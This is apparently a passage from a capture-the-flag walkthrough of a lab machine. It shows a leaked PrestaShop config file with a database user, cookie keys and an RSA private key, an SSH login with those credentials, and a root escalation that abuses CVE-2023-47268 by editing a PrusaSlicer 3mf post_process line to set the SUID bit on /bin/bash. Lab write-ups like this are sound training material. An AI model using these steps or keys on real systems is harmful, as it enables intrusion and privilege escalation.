cd b4a8b52d-651b-44bc-bbc6-f9e8c6590103 
brotli -d f04f0732f120c0cc84a993ad99decb2c.txt.br 
cat f04f0732f120c0cc84a993ad99decb2c.txt
f04f0732f120c0cc84a993ad99decb2c.txt
This website requires JavaScript.
    Explore Help
    Register Sign In
                james/prestashop
              Watch 1
              Star 0
              Fork 0
                You've already forked prestashop
          Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
                main
          prestashop / app / config / parameters.php
            james 8ee5eaf0bb prestashop
            2024-08-30 20:35:25 +01:00

              64 lines
              3.1 KiB
              PHP

            Raw Permalink Blame History

                < ? php return array (                                                                                                                                 
                'parameters' =>                                                                                                                                        
                array (                                                                                                                                                
                'database_host' => '127.0.0.1' ,                                                                                                                       
                'database_port' => '' ,                                                                                                                                
                'database_name' => 'prestashop' ,                                                                                                                      
                'database_user' => 'adam' ,                                                                                                                            
                'database_password' => '' ,                                                                                                               
                'database_prefix' => 'ps_' ,                                                                                                                           
                'database_engine' => 'InnoDB' ,                                                                                                                        
                'mailer_transport' => 'smtp' ,                                                                                                                         
                'mailer_host' => '127.0.0.1' ,                                                                                                                         
                'mailer_user' => NULL ,                                                                                                                                
                'mailer_password' => NULL ,                                                                                                                            
                'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog' ,                                                                       
                'ps_caching' => 'CacheMemcache' ,                                                                                                                      
                'ps_cache_enable' => false ,                                                                                                                           
                'ps_creation_date' => '2024-05-25' ,                                                                                                                   
                'locale' => 'en-US' ,                                                                                                                                  
                'use_debug_toolbar' => true ,                                                                                                                          
                'cookie_key' => '8PR6s1SCD3cLk5GpvkGAZ4K9hMXpx2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i' ,                                                                  
                'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g' ,                                                                                                    
                'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03fbb7f2fb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47' ,
                'api_public_key' => '-----BEGIN PUBLIC KEY-----                                                                                                        
                MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr                                                                                       
                v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG                                                                                       
                5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt                                                                                       
                Scu6QqRAdotokqW2meozijOIJFPFPkpoFKPdVdJ8oslvSt6Kgf39DnBpGIXAqaFc                                                                                       
                QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm                                                                                       
                B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1                                                                                       
                ZQIDAQAB                                                                                                                                               
                -----END PUBLIC KEY-----                                                                                                                               
                ' ,                                                                                                                                                    
                'api_private_key' => '-----BEGIN PRIVATE KEY-----                                                                                                      
                MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC5IVA/fGtlxwpt                                                                                       
                L9UYoyu/x0XggmH0X02+Y9mqIU2kmcEeF9YTdhUz86sREQYrO2QcWxAZRlcUjCIF                                                                                       
                BWzmQAbmN/D6FCuXz34lEPSiBn44dR838KCYzZ6rUf+DEBh9xF/CNKU6HZjMDCku                                                                                       
                /C1hcG1Jy7pCpEB2i2iSpbabdoy34tXwRF0WwGSP785V0nyiyW9K3oqB/f0OcGkY                                                                                       
                hcCpoVxB0x2r7WVP2iJvLR7HJSSXpolTbVJMVnuQJ/RJ5ynZ/02hoqgHAL2bvTsL                                                                                       
                ZQI2QCYHYDbDF/zwEMLsK3BrPANb1Bd0X3ztFTMaP1SsRbBPBgRwlxX+E0Hjvdtz                                                                                       
                K1om9jVlAgMBAAECggEAD5CTdKL7TJVNdRyeZ/HgDcGtSFDt92PD34v5kuo14u7i                                                                                       
                Y6tRXlWBNtr3uPmbcSsPIasuUVGupJWbjpyEKV+ctOJjKkNj3uGdE3S3fJ/bINgI                                                                                       
                BeX/OpmfC3xbZSOHS5ulCWjvs1EltZIYLFEbZ6PSLHAqesvgd5cE9b9k+PEgp50Q                                                                                       
                DivaH4PxfI7IKLlcWiq2mBrYwsWHIlcaN0Ys7h0RYn7OjhrPr8V/LyJLIlapBeQV                                                                                       
                Geq6MswRO6OXfLs4Rzuw1dedDPdDZFdSaef6I2tm4Puq4kB5CzqQ8WfsMiz6zFU/                                                                                       
                UIHnnv9jrqfHGYoq9g5rQWKyjxMTlKA8PnMiKzssiQKBgQDeamSzzG6fdtSlK8zC                                                                                       
                TXHpssVQjbw9aIQYX6YaiApvsi8a6V5E8IesHqDnS+s+9vjrHew4rZ6Uy0uV9p2P                                                                                       
                MAi3gd1Gl9mBQd36Dp53AWik29cxKPdvj92ZBiygtRgTyxWHQ7E6WwxeNUWwMR/i                                                                                       
                4XoaSFyWK7v5Aoa59ECduzJm1wKBgQDVFaDVFgBS36r4fvmw4JUYAEo/u6do3Xq9                                                                                       
                JQRALrEO9mdIsBjYs9N8gte/9FAijxCIprDzFFhgUxYFSoUexyRkt7fAsFpuSRgs                                                                                       
                +Ksu4bKxkIQaa5pn2WNh1rdHq06KryC0iLbNii6eiHMyIDYKX9KpByaGDtmfrsRs                                                                                       
                uxD9umhKIwKBgECAXl/+Q36feZ/FCga3ave5TpvD3vl4HAbthkBff5dQ93Q4hYw8                                                                                       
                rTvvTf6F9900xo95CA6P21OPeYYuFRd3eK+vS7qzQvLHZValcrNUh0J4NvocxVVn                                                                                       
                RX6hWcPpgOgMl1u49+bSjM2taV5lgLfNaBnDLoamfEcEwomfGjYkGcPVAoGBAILy                                                                                       
                1rL84VgMslIiHipP6fAlBXwjQ19TdMFWRUV4LEFotdJavfo2kMpc0l/ZsYF7cAq6                                                                                       
                fdX0c9dGWCsKP8LJWRk4OgmFlx1deCjy7KhT9W/fwv9Fj08wrj2LKXk20n6x3yRz                                                                                       
                O/wWZk3wxvJQD0XS23Aav9b0u1LBoV68m1WCP+MHAoGBANwjGWnrY6TexCRzKdOQ                                                                                       
                K/cEIFYczJn7IB/zbB1SEC19vRT5ps89Z25BOu/hCVRhVg9bb5QslLSGNPlmuEpo                                                                                       
                HfSWR+q1UdaEfABY59ZsFSuhbqvC5gvRZVQ55bPLuja5mc/VvPIGT/BGY7lAdEbK                                                                                       
                6SMIa53I2hJz4IMK4vc2Ssqq                                                                                                                               
                -----END PRIVATE KEY-----                                                                                                                              
                ' ,                                                                                                                                                    
                ),                                                                                                                                                     
                );                                                                                                                                                     
              
                Reference in New Issue View Git Blame Copy Permalink
    Powered by Gitea Version: 1.22.1 Page: 158ms Template: 14ms
      English
        Bahasa Indonesia Deutsch English Español Français Italiano Latviešu Magyar nyelv Nederlands Polski Português de Portugal Português do Brasil Suomi Svenska Türkçe Čeština Ελληνικά Български Русский Українська فارسی മലയാളം 日本語 简体中文 繁體中文(台灣) 繁體中文(香港) 한국어
    Licenses API%                                                      

Use the credentials to ssh into the system as adam.

ssh adam@10.10.11.34
adam@10.10.11ric.34's password: 
adam@trickster:~$ 

Privilege Escalation

Pillaging - adam [ user ]

The user is allowed to run prusaslicer as a sudo without any password.

adam@trickster:~$ sudo -l
Matching Defaults entries for adam on trickster:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User adam may run the following commands on trickster:
    (ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer
adam@trickster:~$ 

The /opt/PrusaSlicer contains the two files, one is prusaslicer binary and another is TRICKSTER.3mf

adam@trickster:~$ cd /opt/PrusaSlicer
adam@trickster:/opt/PrusaSlicer$ ls
prusaslicer  TRICKSTER.3mf
adam@trickster:/opt/PrusaSlicer$ 

PrusaSlicer is a popular 3D slicing software designed for FFF (Fused Filament Fabrication) and mSLA (mask Stereolithography) 3D printers. The prusaslicer is vulnerable to CVE-2023–47268 arbitrary code execution through 3mf files. The exploitdb has a PoC for this vulnerability.

Shell - root [ CVE-2023-47268 Exploit ]

1

Move the TRICKSTER.3mf file into your local system because the file belongs to root and we cannot edit it.

adam@trickster:/opt/PrusaSlicer$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
wget http://10.10.11.34:8000/TRICKSTER.3mf                           
--2025-02-03 01:35:54--  http://10.10.11.34:8000/TRICKSTER.3mf
Connecting to 10.10.11.34:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 138526 (135K) [application/vnd.ms-3mfdocument]
Saving to: ‘TRICKSTER.3mf’

TRICKSTER.3mf                               100%[========================================================================================>] 135.28K  37.6KB/s    in 3.6s    

2025-02-03 01:35:59 (37.6 KB/s) - ‘TRICKSTER.3mf’ saved [138526/138526]
2

Extract the file Metadata/Slic3r_PE.config

unzip -l TRICKSTER.3mf
Archive:  TRICKSTER.3mf
  Length      Date    Time    Name
---------  ---------- -----   ----
      375  2024-05-23 23:08   [Content_Types].xml
    38098  2024-05-23 23:08   Metadata/thumbnail.png
      411  2024-05-23 23:08   _rels/.rels
   549577  2024-05-23 23:08   3D/3dmodel.model
    13624  2024-05-23 23:08   Metadata/Slic3r_PE.config
     3414  2024-05-23 23:08   Metadata/Slic3r_PE_model.config
---------                     -------
   605499                     6 files
unzip TRICKSTER.3mf Metadata/Slic3r_PE.config
Archive:  TRICKSTER.3mf
  inflating: Metadata/Slic3r_PE.config
3

Modify the extracted file for getting shell as root and compress it.

sed -i "s#; post_process =.*#; post_process = /usr/bin/chmod u+s /bin/bash#" Metadata/Slic3r_PE.config
zip -u TRICKSTER.3mf Metadata/Slic3r_PE.config
updating: Metadata/Slic3r_PE.config
	zip warning: Local Entry CRC does not match CD: Metadata/Slic3r_PE.config
 (deflated 69%)
4

Upload the modified TRICKSTER.3mf and execute it with outfile name otherwise it will give the error.

scp TRICKSTER.3mf adam@10.10.11.34:/home/adam
adam@10.10.11.34's password: 
TRICKSTER.3mf                                 100%  135KB  24.1KB/s   00:05
sudo /opt/PrusaSlicer/prusaslicer -s TRICKSTER.3mf -o test
10 => Processing triangulated mesh
10 => Processing triangulated mesh
20 => Generating perimeters
----- SNIP -----
88 => Estimating curled extrusions
88 => Generating skirt and brim
90 => Exporting G-code to test
5

Checking whether the /bin/bash has SUID added or not and execute it to get root shell.

adam@trickster:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14  2024 /bin/bash
adam@trickster:~$ /bin/bash -p
bash-5.1# whoami
root
bash-5.1# 

Change directory to /root, the root.txt file contains the root flag 🎉


Proof of Concept

The below video provides the PoC of Trickster machine.

Last updated